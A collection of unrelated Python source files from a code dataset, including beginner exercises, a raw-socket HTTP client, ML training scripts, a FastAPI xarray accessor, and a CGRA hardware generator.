+{"seq_id":"52649980","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n import sys\n import calculator_1 as calc\n operators = [\"+\", \"-\", \"*\", \"/\"]\n x = sys.argv\n if len(x) != 4:\n (print(\"{}\"\n .format(\"Usage: ./100-my_calculator.py \")))\n exit(1)\n if not x[2] in operators:\n (print(\"{}\"\n .format(\"Unknown operator. Available operators: +, -, * and /\")))\n exit(1)\n a = int(x[1])\n b = int(x[3])\n op = x[2]\n result = (calc.add(a, b)\n if op is \"+\" else calc.sub(a, b)\n if op is \"-\" else calc.mul(a, b)\n if op is \"*\" else calc.div(a, b)\n if op is \"/\" else 0)\n print(\"{} {} {} = {}\".format(a, op, b, result))\n","sub_path":"0x02-python-import_modules/100-my_calculator.py","file_name":"100-my_calculator.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"298673012","text":"import math\n\n#Cost of down payment\nportion_down_payment = 0.25\n#Savings increases each month by monthly salary + investment\ncurrent_savings = 0.0\n#Rate of investment return\nr = 0.04\n\n#Inputs\n\n#Total annual salary\nannual_salary = float(input(\"Enter your annual salary: \"))\n#Portion of salary saved each month for down payment\nportion_saved = float(input(\"Enter the portion of your salary to be saved, as a decimal: \"))\n#Cost of your dream home\ntotal_cost = float(input(\"Enter the cost of your dream home: \"))\n\ndown_payment = total_cost*portion_down_payment\nmonths = 0\n\nwhile current_savings < down_payment:\n current_savings = current_savings + portion_saved*(annual_salary/12) + (r/12)*(current_savings)\n months += 1\n\nprint(\"Number of months: \" + str(months))\n\n\n","sub_path":"Problem set 1/ps1a.py","file_name":"ps1a.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"549612027","text":"import socket\nimport ssl\n\n\ndef log(*args, **kwargs):\n\tprint(\"Log: \", *args, **kwargs)\n\n\ndef parsed_url(url):\n\t\"\"\"\n 解析 url 返回 (protocol host port path)\n 有的时候有的函数, 它本身就美不起来, 你要做的就是老老实实写\n \"\"\"\n\t# 检查协议\n\tprotocol = 'http'\n\tif url[:7] == 'http://':\n\t\tu = url.split('://')[1]\n\telif url[:8] == 'https://':\n\t\tprotocol = 'https'\n\t\tu = url.split('://')[1]\n\telse:\n\t\t# '://' 定位 然后取第一个 / 的位置来切片\n\t\tu = url\n\n\t# 检查默认 path\n\ti = u.find('/')\n\tif i == -1:\n\t\thost = u\n\t\tpath = '/'\n\telse:\n\t\thost = u[:i]\n\t\tpath = u[i:]\n\n\t# 检查端口\n\tport_dict = {\n\t\t'http': 80,\n\t\t'https': 443,\n\t}\n\t# 默认端口\n\tport = port_dict[protocol]\n\tif host.find(':') != -1:\n\t\th = host.split(':')\n\t\thost = h[0]\n\t\tport = int(h[1])\n\n\treturn protocol, host, port, path\n\n\ndef socket_by_protocol(protocol):\n\t\"\"\"\n 根据协议返回一个 socket 实例\n \"\"\"\n\tif protocol == 'http':\n\t\ts = socket.socket()\n\telse:\n\t\t# HTTPS 协议需要使用 ssl.wrap_socket 包装一下原始的 socket\n\t\t# 除此之外无其他差别\n\t\ts = ssl.wrap_socket(socket.socket())\n\treturn s\n\ndef response_by_socket(s):\n\t\"\"\"\n 参数是一个 socket 实例\n 返回这个 socket 读取的所有数据\n \"\"\"\n\tresponse = b''\n\tbuffer_size = 1024\n\twhile True:\n\t\tr = s.recv(buffer_size)\n\t\tif len(r) == 0:\n\t\t\tbreak\n\t\tresponse += r\n\treturn response\n\n\ndef parsed_response(r):\n\t\"\"\"\n 把 response 解析出 状态码 headers body 返回\n 状态码是 int\n headers 是 dict\n body 是 str\n \"\"\"\n\theader, body = r.split('\\r\\n\\r\\n', 1)\n\th = header.split('\\r\\n')\n\tstatus_code = h[0].split()[1]\n\tstatus_code = int(status_code)\n\n\theaders = {}\n\tfor line in h[1:]:\n\t\tk, v = line.split(': ')\n\t\theaders[k] = v\n\treturn status_code, headers, body\n\n\ndef header_from_dict(headers):\n\t'''\n headers 是一个字典\n 范例如下\n 对于\n {\n \t'Content-Type': 'text/html',\n 'Content-Length': 127,\n }\n 返回如下 str\n 'Content-Type: text/html\\r\\nContent-Length: 127\\r\\n'\n '''\n\tq = \"\"\n\tfor key, value in headers.items():\n\t\tq += key + \": \" + value + \"\\r\\n\"\n\n\treturn q\n\n\ndef get(url, query):\n\tprotocol, host, port, path = parsed_url(url)\n\tlog(\"访问:\", protocol, host, port, path)\n\n\ts = socket_by_protocol(protocol)\n\ts.connect((host, port)) # 连接网络: 访问网站\n\n\theaders = header_from_dict(query)\n\thttp_request = 'GET {} HTTP/1.1\\r\\nhost: {}\\r\\nConnection: close\\r\\n{}\\r\\n'.format(path, host, headers)\n\trequest = http_request.encode(\"utf-8\")\n\tlog(\"***用户开始访问: {}\".format(url))\n\tlog(\"***用户发送请求: [{}]\".format(request))\n\n\ts.send(request)\n\n\tresponse = response_by_socket(s)\n\tr = response.decode(\"utf-8\")\n\tlog(\"响应\", r)\n\tstatus_code, headers, body = parsed_response(r)\n\tif status_code == 301:\n\t\turl = headers['Location']\n\t\treturn get(url, query)\n\treturn status_code, headers, body\n\n\nif __name__ == \"__main__\":\n\turl = 'https://movie.douban.com/top250'\n\tquery = {\n\t\t'Accept': 'text/html',\n\t\t'Accept - Language': 'zh - CN, zh;q = 0.9, en;q = 0.8',\n\t}\n\tstatus_code, headers, body = get(url, query)\n","sub_path":"原理性Demo/pythonWeb/web2/my/cliect.py","file_name":"cliect.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"289454803","text":"from stack import Stack\nfrom builders import RandomStackBuilder, ConcreteStackBuilder\n\n\ndef fight(stack1, stack2):\n damage1 = stack1._number * stack1._damage * (stack1._attack - stack2._defence)\n if damage1 < 0:\n damage1 = 0\n stack2.get_damage(damage1)\n if stack2._is_dead:\n return\n else:\n if stack1._retaliation:\n damage2 = stack2._number * stack2._damage * (stack2._attack - stack1._defence)\n if damage2 < 0:\n damage2 = 0\n stack1.get_damage(damage2)\n\n\ndef check_alive(stack1, stack2):\n if stack1._is_dead:\n print(\"Second stack won this battle\")\n return False\n\n if stack2._is_dead:\n print(\"First stack won this battle\")\n return False\n\n return True\n\n\ndef fight_to_death(stack1: Stack, stack2: Stack):\n\n if stack1._is_dead or stack2._is_dead:\n print(\"I'm really sorry, but some of these creatures are dead\")\n \n else:\n while True:\n fight(stack1, stack2)\n if not check_alive(stack1, stack2):\n break\n\n fight(stack2, stack1)\n if not check_alive(stack1, stack2):\n break\n\n\nconcrete_builder = ConcreteStackBuilder()\nconcrete_builder.set_attack(20)\nconcrete_builder.set_defence(20)\nconcrete_builder.set_damage(50)\nconcrete_builder.set_max_health(200)\nconcrete_builder.set_number(3)\n\nrandom_builder = RandomStackBuilder()\nrandom_builder.set_attack()\nrandom_builder.set_defence()\nrandom_builder.set_damage()\nrandom_builder.set_max_health()\nrandom_builder.set_number()\nrandom_builder.make_no_retaliation()\n\nangels = concrete_builder.get_stack()\nrandom_creatures = random_builder.get_stack()\n\nfight_to_death(angels, random_creatures)\n \n","sub_path":"build_and_fight.py","file_name":"build_and_fight.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"493812011","text":"import cachey\nimport uvicorn\nimport xarray as xr\nfrom fastapi import FastAPI\n\nfrom .dependencies import get_cache, get_dataset\nfrom .routers import base_router, common_router, zarr_router\nfrom .utils.api import check_route_conflicts, normalize_app_routers\n\n\n@xr.register_dataset_accessor('rest')\nclass RestAccessor:\n \"\"\"REST API Accessor\n\n Parameters\n ----------\n xarray_obj : Dataset\n Dataset object to be served through the REST API.\n\n Notes\n -----\n When using this as an accessor on an Xarray.Dataset, options are set via\n the ``RestAccessor.__call__()`` method.\n\n \"\"\"\n\n def __init__(self, xarray_obj):\n\n self._obj = xarray_obj\n\n self._app = None\n self._app_kws = {}\n self._app_routers = [\n (common_router, {}),\n (base_router, {'tags': ['info']}),\n (zarr_router, {'tags': ['zarr']}),\n ]\n\n self._cache = None\n self._cache_kws = {'available_bytes': 1e6}\n\n self._initialized = False\n\n def __call__(self, routers=None, cache_kws=None, app_kws=None):\n \"\"\"Initialize this accessor by setting optional configuration values.\n\n Parameters\n ----------\n routers : list, optional\n A list of :class:`fastapi.APIRouter` instances to include in the\n fastAPI application. If None, the default routers will be included.\n The items of the list may also be tuples with the following format:\n ``[(router1, {'prefix': '/foo', 'tags': ['foo', 'bar']})]``.\n The 1st tuple element is a :class:`fastapi.APIRouter` instance and the\n 2nd element is a dictionary that is used to pass keyword arguments to\n :meth:`fastapi.FastAPI.include_router`.\n cache_kws : dict, optional\n Dictionary of keyword arguments to be passed to\n :meth:`cachey.Cache.__init__()`.\n app_kws : dict, optional\n Dictionary of keyword arguments to be passed to\n :meth:`fastapi.FastAPI.__init__()`.\n\n Notes\n -----\n This method can only be invoked once.\n\n \"\"\"\n if self._initialized:\n raise RuntimeError('This accessor has already been initialized')\n self._initialized = True\n\n if routers is not None:\n self._app_routers = normalize_app_routers(routers)\n check_route_conflicts(self._app_routers)\n if app_kws is not None:\n self._app_kws.update(app_kws)\n if cache_kws is not None:\n self._cache_kws.update(cache_kws)\n\n return self\n\n @property\n def cache(self) -> cachey.Cache:\n \"\"\"Returns the :class:`cachey.Cache` instance used by the FastAPI application.\"\"\"\n\n if self._cache is None:\n self._cache = cachey.Cache(**self._cache_kws)\n return self._cache\n\n def _init_app(self):\n \"\"\"Initiate the FastAPI application.\"\"\"\n\n self._app = FastAPI(**self._app_kws)\n\n for rt, kwargs in self._app_routers:\n self._app.include_router(rt, **kwargs)\n\n self._app.dependency_overrides[get_dataset] = lambda: self._obj\n self._app.dependency_overrides[get_cache] = lambda: self.cache\n\n return self._app\n\n @property\n def app(self) -> FastAPI:\n \"\"\"Returns the :class:`fastapi.FastAPI` application instance.\"\"\"\n if self._app is None:\n self._app = self._init_app()\n return self._app\n\n def serve(self, host='0.0.0.0', port=9000, log_level='debug', **kwargs):\n \"\"\"Serve this FastAPI application via :func:`uvicorn.run`.\n\n Parameters\n ----------\n host : str\n Bind socket to this host.\n port : int\n Bind socket to this port.\n log_level : str\n App logging level, valid options are\n {'critical', 'error', 'warning', 'info', 'debug', 'trace'}.\n kwargs :\n Additional arguments to be passed to :func:`uvicorn.run`.\n\n Notes\n -----\n This method is blocking and does not return.\n\n \"\"\"\n uvicorn.run(self.app, host=host, port=port, log_level=log_level, **kwargs)\n","sub_path":"xpublish/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"530333593","text":"#!/usr/bin/python3\n\"\"\" Using Reddit API \"\"\"\n\nimport requests\n\n\ndef recurse(subreddit, hot_list=[], after=''):\n \"\"\"Function that queries Reddit API and returns a list\n containing the titles of all hot articles for a given subreddit\"\"\"\n\n header = {'user-agent': 'Sorec21'}\n param = {'after': after}\n url = 'https://www.reddit.com/r/{}/hot.json?after={}'.format(\n subreddit,\n after\n )\n req = requests.get(\n url,\n headers=header,\n allow_redirects=False\n )\n\n if req.status_code == 200:\n hot_list += req.json().get(\"data\", {}).get(\"children\", [])\n after_aux = req.json().get(\"data\", {}).get(\"after\", None)\n\n if after_aux:\n return recurse(subreddit, hot_list=hot_list, after=after_aux)\n else:\n return hot_list\n","sub_path":"0x16-api_advanced/2-recurse.py","file_name":"2-recurse.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"152102360","text":"import botogram\nbot = botogram.create(\"229216221:AAHMONo23pwOrfJjK2fGWUwcR-Oaigs9uWc\")\n\n@bot.command(\"hello\")\ndef hello_command(chat, message, args):\n \"\"\"Say hello to the world!\"\"\"\n chat.send(\"Hello world\")\n\nif __name__ == \"__main__\":\n bot.run()","sub_path":"NotPatBot.py","file_name":"NotPatBot.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"300486930","text":"#!/usr/bin/env python3\n\n'''Starting in the top left corner of a 2×2 grid, and only being able to move to the right and down, there are exactly 6 routes to the bottom right corner.\n\nHow many such routes are there through a 20×20 grid?'''\n\nif __name__ == '__main__' :\n # initialize grid\n grid = list()\n for i in range(20) :\n grid.append([0]*20)\n\n\n\n for i in range(20) :\n grid[0][i] = i + 2\n grid[i][0] = i + 2\n\n for y in range(1,20) :\n for x in range(1,20) :\n grid[y][x] = grid[y-1][x] + grid[y][x-1]\n\n print(grid[-1][-1])\n \n","sub_path":"python/p15.py","file_name":"p15.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"345817496","text":"import os\nimport sys\nfrom train_CNN import fit_model\nfrom utils.UCF_utils import get_data_list\nfrom models.temporal_CNN import temporal_CNN\n\nN_CLASSES=101\nif __name__ == '__main__':\n dataset = 'ucf'\n if len(sys.argv) > 0:\n dataset = sys.argv[1]\n cwd = os.getcwd()\n data_dir = os.path.join(cwd,'data')\n if 'hmdb' in dataset.lower():\n list_dir = os.path.join(data_dir,'hmdb51_test_train_splits')\n else:\n list_dir = os.path.join(data_dir,'ucfTrainTestlist')\n \n weights_dir = os.path.join('models')\n weights_dir = os.path.join(cwd,'models')\n old_weights_dir = os.path.join(weights_dir, 'temporal_cnn_42.h5')\n new_weights_dir = os.path.join(weights_dir, 'temporal_cnn_43.h5')\n video_dir = os.path.join(data_dir, 'OF_data')\n train_data, test_data, class_index = get_data_list(list_dir, video_dir)\n input_shape = (216, 216, 18)\n model = temporal_CNN(input_shape, N_CLASSES, new_weights_dir, include_top=True)\n fit_model(model, train_data, test_data, new_weights_dir, input_shape, optical_flow=True)\n\n","sub_path":"train_CNN_of.py","file_name":"train_CNN_of.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"312044877","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Test feature plotting.\"\"\"\n\n#------------------------------------------------------------------------------\n# Imports\n#------------------------------------------------------------------------------\n\nimport numpy as np\n\nfrom ...utils.logging import set_level\nfrom ..features import FeatureView\nfrom ...utils._color import _random_color\nfrom ...io.mock.artificial import (artificial_features,\n artificial_masks,\n artificial_spike_clusters,\n artificial_spike_samples)\nfrom ...utils.testing import show_test\n\n\n#------------------------------------------------------------------------------\n# Fixtures\n#------------------------------------------------------------------------------\n\ndef setup():\n set_level('debug')\n\n\ndef teardown():\n pass\n\n\n#------------------------------------------------------------------------------\n# Tests\n#------------------------------------------------------------------------------\n\ndef _test_features(n_spikes=None, n_clusters=None):\n n_channels = 32\n n_features = 3\n\n features = artificial_features(n_spikes, n_channels, n_features)\n masks = artificial_masks(n_spikes, n_channels)\n spike_clusters = artificial_spike_clusters(n_spikes, n_clusters)\n spike_samples = artificial_spike_samples(n_spikes).astype(np.float32)\n\n c = FeatureView()\n c.visual.features = features\n # Useful to test depth.\n # masks[n_spikes//2:, ...] = 0\n c.visual.masks = masks\n c.dimensions = ['time', (0, 0), (1, 0), (2, 0)]\n c.visual.spike_clusters = spike_clusters\n c.visual.spike_samples = spike_samples\n c.visual.cluster_colors = np.array([_random_color()\n for _ in range(n_clusters)])\n\n show_test(c)\n\n\ndef test_features_empty():\n _test_features(n_spikes=0, n_clusters=0)\n\n\ndef test_features_full():\n _test_features(n_spikes=100, n_clusters=3)\n","sub_path":"phy/plot/tests/test_features.py","file_name":"test_features.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"355401834","text":"from __future__ import annotations\n\nimport yul.yul_ast as ast\nfrom yul.AstMapper import AstMapper\nfrom yul.call_graph import build_callgraph, CallGraph\n\n\nclass FunctionPruner(AstMapper):\n def __init__(self, public_functions: list[str]):\n super().__init__()\n self.public_functions: frozenset[str] = frozenset(public_functions)\n self.callgraph: CallGraph = {}\n self.visited_functions: set[str] = set()\n\n def map(self, node: ast.Node, *args, **kwargs) -> ast.Node:\n if not isinstance(node, ast.Block):\n return self.visit(node, *args, **kwargs)\n\n self.callgraph = build_callgraph(node)\n for function in self.callgraph:\n f_name = function.name\n if f_name in self.public_functions or f_name == \"fun_ENTRY_POINT\":\n self._dfs(function)\n\n return self.visit(node, *args, **kwargs)\n\n def visit_block(self, node: ast.Block):\n statements = []\n for stmt in node.statements:\n if self._is_unused_function(stmt):\n continue\n statements.append(self.visit(stmt))\n\n return ast.Block(statements=tuple(statements))\n\n def _dfs(self, function: ast.FunctionDefinition):\n if function.name in self.visited_functions:\n return\n\n self.visited_functions.add(function.name)\n for f in self.callgraph[function]:\n self._dfs(f)\n\n def _is_unused_function(self, node):\n return (\n isinstance(node, ast.FunctionDefinition)\n and node.name not in self.visited_functions\n )\n","sub_path":"warp/yul/FunctionPruner.py","file_name":"FunctionPruner.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570302664","text":"\"\"\"empty message\n\nRevision ID: d6461826e9df\nRevises: cb332e155c93\nCreate Date: 2018-05-27 08:44:23.852942\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd6461826e9df'\ndown_revision = 'cb332e155c93'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('name', sa.String(length=64), nullable=True))\n op.add_column('user', sa.Column('surname', sa.String(length=64), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'surname')\n op.drop_column('user', 'name')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/d6461826e9df_.py","file_name":"d6461826e9df_.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522402189","text":"#!/usr/bin/env python:\n\n# %% Necessary packages\n# GPU node choice\nimport sys, ast, os\nimport time\nimport scanpy as sc\nimport numpy as np\n\nsys.path.append(os.getcwd())\nfrom INVASE import KeyTF\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n# The GPU id to use, usually either \"0\" or \"1\";\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"6\"\n\n'''\npipenv shell\ncd PycharmProject/INVASE/\n\npython3 main/run_file.py \"['CD4', 'CD8A', 'CD8B', 'CD19', 'CTLA4', 'TIGIT', 'GNG4', 'GNG8', 'CDK1']\" 2> log/log18092019.txt\n'''\n\n#exec(open('INVASE.py').read())\n# selected_gene check:\n# 'ZBTB16' in TF_list_total\n\nif __name__ == '__main__':\n arg = ast.literal_eval(sys.argv[1])\n target_Genes = arg\n selected_celltype = None\n # selected_celltype = arg[1] #['CD4+T', 'CD4+Tmem', 'CD8+T', 'CD8+Tmem', 'B_mature']\n\n assert isinstance(target_Genes, list)\n # assert isinstance(selected_celltype, list)\n\n print('target gene selected: %s' % (target_Genes))\n # print('cell type selected: %s' % (selected_celltype))\n # %% Data loading\n print(\"data loading\")\n DATAFILE = '../data/thymus/'\n # save_path = DATAFILE + \"A42.v01.yadult_raw.h5ad\"\n save_path = DATAFILE + \"HTA07.A04.v01.adata_fig1.h5ad\"\n\n adataset = sc.read_h5ad(save_path)\n print ('data is loaded')\n\n assert sum(adataset.raw.var.GeneName.isin(target_Genes)) == len(target_Genes)\n\n TF_list_total = np.loadtxt('main/TF_names.txt', dtype='str').tolist()\n\n #print(\"%d out of %d genes are selected highly variable genes\" % (\n # adataset.var.GeneName.size, adataset.raw.var.GeneName.size))\n\n\n\n # %% run INVASE model\n try1 = KeyTF(adataset = adataset, target_Genes = target_Genes, TF_list_total = TF_list_total, raw_counts = True)\n try1.filter_matrix()\n for gene in range(len(target_Genes)):\n t0 = time.time()\n PVS_Alg = try1.implement_invase(gene=gene)\n\n t = (time.time() - t0)/60\n save_name = 'all_cells' + '@' + target_Genes[gene]\n #save_name = '|'.join(selected_celltype) + '@' + gene\n\n model = PVS_Alg.generator\n model.name = dict(selected_celltype = selected_celltype, target_Gene = gene, time_spend = t)\n\n\n model_json = model.to_json()\n with open(\"results/generator_%s.json\" % save_name, \"w\") as json_file:\n json_file.write(model_json)\n model.save_weights(\"results/weights_%s.h5\" % save_name)\n print(\"Saved model: %s\" % save_name)\n print('cell type selected: %s' % ('all cells'))\n print('target gene selected: %s' % (target_Genes[gene]))\n print('Time spent: %.2f minutes' % t)","sub_path":"main/run_file.py","file_name":"run_file.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"506498676","text":"import argparse\nimport magma\nimport coreir\nfrom canal.util import IOSide\nfrom gemstone.common.configurable import ConfigurationType\nfrom gemstone.common.jtag_type import JTAGType\nfrom gemstone.generator.generator import Generator\nfrom global_controller.global_controller_magma import GlobalController\nfrom global_controller.global_controller_wire_signal import\\\n glc_interconnect_wiring\nfrom global_buffer.io_placement import place_io_blk\nfrom global_buffer.global_buffer_magma import GlobalBuffer\nfrom global_buffer.global_buffer_wire_signal import glb_glc_wiring, \\\n glb_interconnect_wiring\nfrom global_buffer.soc_data_type import SoCDataType\nfrom global_controller.axi4_type import AXI4SlaveType\nfrom canal.global_signal import GlobalSignalWiring\nfrom lassen.sim import gen_pe\nfrom cgra import create_cgra\nimport metamapper\nimport subprocess\nimport os\nimport math\nimport archipelago\nimport json\nfrom lassen import rules as lassen_rewrite_rules\nfrom lassen import LassenMapper\n\nfrom io_core.io_core_magma import IOCore\nfrom peak_core.peak_core import PeakCore\n\n\nclass Garnet(Generator):\n def __init__(self, width, height, add_pd, interconnect_only: bool = False,\n use_sram_stub: bool = True):\n super().__init__()\n\n # configuration parameters\n config_addr_width = 32\n config_data_width = 32\n axi_addr_width = 12\n tile_id_width = 16\n config_addr_reg_width = 8\n num_tracks = 5\n\n # size\n self.width = width\n self.height = height\n\n # only north side has IO\n io_side = IOSide.North\n\n # global buffer parameters\n num_banks = 32\n bank_addr_width = 17\n bank_data_width = 64\n glb_addr_width = 32\n\n # parallel configuration parameter\n num_parallel_cfg = math.ceil(width / 4)\n\n # number of input/output channels parameter\n num_io = math.ceil(width / 4)\n\n if not interconnect_only:\n wiring = GlobalSignalWiring.ParallelMeso\n self.global_controller = GlobalController(config_addr_width,\n config_data_width,\n axi_addr_width)\n\n self.global_buffer = GlobalBuffer(num_banks=num_banks,\n num_io=num_io,\n num_cfg=num_parallel_cfg,\n bank_addr_width=bank_addr_width,\n glb_addr_width=glb_addr_width,\n cfg_addr_width=config_addr_width,\n cfg_data_width=config_data_width,\n axi_addr_width=axi_addr_width)\n else:\n wiring = GlobalSignalWiring.Meso\n\n interconnect = create_cgra(width, height, io_side,\n reg_addr_width=config_addr_reg_width,\n config_data_width=config_data_width,\n tile_id_width=tile_id_width,\n num_tracks=num_tracks,\n add_pd=add_pd,\n use_sram_stub=use_sram_stub,\n global_signal_wiring=wiring,\n num_parallel_config=num_parallel_cfg,\n mem_ratio=(1, 4))\n\n self.interconnect = interconnect\n\n if not interconnect_only:\n self.add_ports(\n jtag=JTAGType,\n clk_in=magma.In(magma.Clock),\n reset_in=magma.In(magma.AsyncReset),\n soc_data=SoCDataType(glb_addr_width, bank_data_width),\n axi4_ctrl=AXI4SlaveType(axi_addr_width, config_data_width),\n cgra_running_clk_out=magma.Out(magma.Clock),\n )\n\n # top <-> global controller ports connection\n self.wire(self.ports.clk_in, self.global_controller.ports.clk_in)\n self.wire(self.ports.reset_in,\n self.global_controller.ports.reset_in)\n self.wire(self.ports.jtag, self.global_controller.ports.jtag)\n self.wire(self.ports.axi4_ctrl,\n self.global_controller.ports.axi4_ctrl)\n self.wire(self.ports.cgra_running_clk_out,\n self.global_controller.ports.clk_out)\n\n # top <-> global buffer ports connection\n self.wire(self.ports.soc_data, self.global_buffer.ports.soc_data)\n glc_interconnect_wiring(self)\n glb_glc_wiring(self)\n glb_interconnect_wiring(self, width, num_parallel_cfg)\n else:\n # lift all the interconnect ports up\n self._lift_interconnect_ports(config_data_width)\n\n self.mapper_initalized = False\n self.__rewrite_rules = None\n\n def _lift_interconnect_ports(self, config_data_width):\n for name in self.interconnect.interface():\n self.add_port(name, self.interconnect.ports[name].type())\n self.wire(self.ports[name], self.interconnect.ports[name])\n self.add_ports(\n clk=magma.In(magma.Clock),\n reset=magma.In(magma.AsyncReset),\n config=magma.In(\n ConfigurationType(self.interconnect.config_data_width,\n self.interconnect.config_data_width)),\n stall=magma.In(\n magma.Bits[self.interconnect.stall_signal_width]),\n read_config_data=magma.Out(magma.Bits[config_data_width])\n )\n self.wire(self.ports.clk, self.interconnect.ports.clk)\n self.wire(self.ports.reset, self.interconnect.ports.reset)\n self.wire(self.ports.config,\n self.interconnect.ports.config)\n self.wire(self.ports.stall,\n self.interconnect.ports.stall)\n self.wire(self.interconnect.ports.read_config_data,\n self.ports.read_config_data)\n\n def set_rewrite_rules(self,rewrite_rules):\n self.__rewrite_rules = rewrite_rules\n\n def initialize_mapper(self, rewrite_rules=None,discover=False):\n if self.mapper_initalized:\n raise RuntimeError(\"Can not initialize mapper twice\")\n # Set up compiler and mapper.\n self.coreir_context = coreir.Context()\n\n #Initializes with all the custom rewrite rules\n self.mapper = LassenMapper(self.coreir_context)\n\n # Either load rewrite rules from cached file or generate them by\n # discovery.\n if rewrite_rules:\n with open(rewrite_rules) as jfile:\n rules = json.load(jfile)\n for rule in rules:\n self.mapper.add_rr_from_description(rule)\n elif discover:\n # Hack to speed up rewrite rules discovery.\n bypass_mode = lambda inst: (\n inst.rega == type(inst.rega).BYPASS and\n inst.regb == type(inst.regb).BYPASS and\n inst.regd == type(inst.regd).BYPASS and\n inst.rege == type(inst.rege).BYPASS and\n inst.regf == type(inst.regf).BYPASS\n )\n self.mapper.add_discover_constraint(bypass_mode)\n self.mapper.discover_peak_rewrite_rules(width=16)\n else:\n for rule in lassen_rewrite_rules:\n self.mapper.add_rr_from_description(rule)\n\n self.mapper_initalized = True\n\n def map(self, halide_src):\n assert self.mapper_initalized\n app = self.coreir_context.load_from_file(halide_src)\n self.mapper.map_app(app)\n instrs = self.mapper.extract_instr_map(app)\n return app, instrs\n\n def run_pnr(self, info_file, mapped_file):\n cgra_path = os.getenv(\"CGRA_PNR\", \"\")\n assert cgra_path != \"\", \"Cannot find CGRA PnR\"\n entry_point = os.path.join(cgra_path, \"scripts\", \"pnr_flow.sh\")\n subprocess.check_call([entry_point, info_file, mapped_file])\n\n def get_placement_bitstream(self, placement, id_to_name, instrs):\n result = []\n for node, (x, y) in placement.items():\n instance = id_to_name[node]\n if instance not in instrs:\n continue\n instr = instrs[instance]\n result += self.interconnect.configure_placement(x, y, instr)\n return result\n\n @staticmethod\n def __instance_to_int(mod: coreir.module.Module):\n top_def = mod.definition\n result = {}\n instances = {}\n\n for instance in top_def.instances:\n instance_name = instance.name\n assert instance_name not in result\n result[instance_name] = str(len(result))\n instances[instance_name] = instance\n return result, instances\n\n def __get_available_cores(self):\n result = {}\n for tile in self.interconnect.tile_circuits.values():\n core = tile.core\n tags = core.pnr_info()\n if not isinstance(tags, list):\n tags = [tags]\n for tag in tags:\n if tag.tag_name not in result:\n result[tag.tag_name] = tag, core\n return result\n\n def convert_mapped_to_netlist(self, mapped):\n instance_id, instances = self.__instance_to_int(mapped)\n core_tags = self.__get_available_cores()\n name_to_id = {}\n module_name_to_tag = {}\n netlist = {}\n bus = {}\n # map instances to tags\n for instance_name, instance in instances.items():\n module_name = instance.module.name\n if module_name == \"PE\":\n # it's a PE core\n # FIXME: because generators are not hashable, we can't reverse\n # index table search the tags\n # after @perf branch is merged into master, we need to\n # refactor the following code\n if module_name not in module_name_to_tag:\n instance_tag = \"\"\n for tag_name, (tag, core) in core_tags.items():\n if isinstance(core, PeakCore):\n instance_tag = tag_name\n break\n assert instance_tag != \"\", \"Cannot find the core\"\n module_name_to_tag[module_name] = instance_tag\n elif instance.module.name == \"io16\":\n # it's an IO core\n if module_name not in module_name_to_tag:\n instance_tag = \"\"\n for tag_name, (tag, core) in core_tags.items():\n if isinstance(core, IOCore):\n instance_tag = tag_name\n break\n assert instance_tag != \"\", \"Cannot find the core\"\n module_name_to_tag[module_name] = instance_tag\n else:\n raise ValueError(f\"Cannot find CGRA core for {module_name}. \"\n f\"Is the mapper working?\")\n\n name_to_id[instance_name] = module_name_to_tag[module_name] + \\\n instance_id[instance_name]\n # get connections\n src_to_net_id = {}\n for conn in mapped.directed_module.connections:\n assert len(conn.source) == 2\n assert len(conn.sink) == 2\n src_name, src_port = conn.source\n dst_name, dst_port = conn.sink\n src_id = name_to_id[src_name]\n dst_id = name_to_id[dst_name]\n if (src_name, src_port) not in src_to_net_id:\n net_id = \"e\" + str(len(netlist))\n netlist[net_id] = [(src_id, src_port)]\n src_to_net_id[(src_name, src_port)] = net_id\n else:\n net_id = src_to_net_id[(src_name, src_port)]\n netlist[net_id].append((dst_id, dst_port))\n # get bus width\n src_instance = instances[src_name]\n width = src_instance.select(src_port).type.size\n if net_id in bus:\n assert bus[net_id] == width\n else:\n bus[net_id] = width\n\n id_to_name = {}\n for name, id in name_to_id.items():\n id_to_name[id] = name\n return netlist, bus, id_to_name\n\n 